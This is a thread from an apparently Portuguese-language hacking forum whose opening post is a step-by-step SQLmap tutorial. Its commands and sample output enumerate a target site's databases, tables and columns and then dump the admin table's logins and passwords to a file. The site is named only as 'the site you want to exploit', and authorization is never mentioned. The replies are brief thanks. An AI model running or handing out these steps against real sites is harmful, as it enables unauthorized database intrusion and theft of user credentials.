Search...

OLÁ ROBMENDES Unread Replies

Fórum The Anony Bay » T.A.B SECURITY »

- Bugs & Exploits »

Tutorial de SQLmap

RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1]

Tutorial de SQLmap

« Online: 19-04-2013, 03:23:58 »CitarXiranha!

S.Administrador

Membro Participativo

Mensagens: 123

144 credits

View Inventory

Send Money To Xiranha!

Agradecimentos 202

"O medo só existe na mente dos

Curtir Seja o primeiro de seus amigos a curtir isso.

Oque é SQLmap ?

Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de

vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de

oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o

sistema de banco de dados se for possivel.

Para ver os comandos, basta digitar

Código: [Selecionar]

python sqlmap.py -h

Estudo

Após você ter o site que deseja explorar, digite

Código: [Selecionar]

python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 --dbs

--dbs é para descobrir a(s) database(s) que contem no site

O resultado será mais ou menos assim:

Código: [Selecionar]

[ * ] database_do_site<br />[ * ] information_schema

Após descobrir a(s) data base(s), digite

Código: [Selecionar]

python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site --tables

« tópico anterior tópico seguinte »

Autor Tópico: Tutorial de SQLmap (Lida 108 vezes)

Início AjudaAjuda BuscaBusca Editar PerfilEditar Perfil Minhas MensagensMinhas Mensagens Today's PostsToday's Posts ShopShop MembrosMembros SairSair

TweetTweet 0 0

Fracos"

--tables é para descobrir as tabelas que tem dentro da database

O resultado será mais ou menos assim:

Código: [Selecionar]

+---------------+<br />| admin |<br />| publicidade |<br />| teste |<br />+---------------+

Após descobrir as tabelas, digite :

Código: [Selecionar]

python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin --columns

--columns é para descobrir as colunas que tem dentro da tabela escolhida

O resultado será mais ou menos assim :

Código: [Selecionar]

+--------+--------------+<br />| Column | Type |<br />+--------+--------------+<br />| ID | int(11) |<br />| login | varchar(255) |<br />| senha | varchar(255) |<br />+--------+--------------+

Após descobrir as colunas, digite :

Código: [Selecionar]

python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin -C 'login,senha' --dump

--dump é para extrair os dados do site. mas não é qualquer dado, tem que estar dentro da coluna escolhida, e você

tem que escolher o que extrair da coluna, no caso eu extrai os logins e senhas que estão salvo dentro da coluna

De uma forma, os logins e senhas vão aparecer na própria shell, mas também ira ser extraída, para um arquivo dentro da

pasta

/pentest/database/sqlmap/output/sitedesejado.com.br/dump/database_do_site/admin.csv

Reportar ao moderador Registrado

"não Clique"

Re:Tutorial de SQLmap

« Resposta #1 Online: 19-04-2013, 06:30:43 »CitarPseudônimo

Administrador

Membro ExpertCurtir Seja o primeiro de seus amigos a curtir isso.

Eita Rafa, obrigado pelo ótimo tutorial. Parabéns.

TweetTweet 0 0

Mensagens: 293

202 credits

View Inventory

Send Money To Pseudônimo

Agradecimentos 46

Reportar ao moderador Registrado

Re:Tutorial de SQLmap

« Resposta #2 Online: 28-04-2013, 14:30:36 »Citarpnp

Novato

Mensagens: 11

90 credits

View Inventory

Send Money To pnp

Agradecimentos 0

Curtir Seja o primeiro de seus amigos a curtir isso.

ótimo Tutorial.

Reportar ao moderador Registrado

Re:Tutorial de SQLmap

« Resposta #3 Online: 25-06-2013, 00:10:53 »CitarWhisper

Membro Participativo

Mensagens: 66

Curtir Seja o primeiro de seus amigos a curtir isso.

muito bom mesmo..

vlw..

Reportar ao moderador Registrado

TweetTweet 0 0

TweetTweet 0 0

428 credits

View Inventory

Send Money To Whisper

Agradecimentos 2

Re:Tutorial de SQLmap

« Resposta #4 Online: 25-06-2013, 09:42:40 »CitarTh3Jok3rG4m3r

Na terra dos assassinos a mente

de um pecador é santuário.

Moderador Expert

Membro Expert

Mensagens: 340

2752 credits

View Inventory

Send Money To Th3Jok3rG4m3r

Agradecimentos 65

É, Eu sou um tanto quanto

ESTRANHO! Shhh Vá Dormir

Curtir Seja o primeiro de seus amigos a curtir isso.

Bem interessante Rafa, parabéns pelo tutorial

Reportar ao moderador Registrado

"Se RAP fosse coisa de bandido,muitos dos políticos seriam os MC's.

¯\_(ツ)_/¯ "

RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1]

Fórum The Anony Bay » T.A.B SECURITY »

- Bugs & Exploits »

Tutorial de SQLmap

Resposta Rápida

« tópico anterior tópico seguinte »

Ir para: => - Bugs & Exploits OK

TweetTweet 0 0

SMF 2.0.4 | SMF © 2013, Simple Machines

SMFAds for Free Forums

Fórum The Anony Bay by Host By : TheHostBay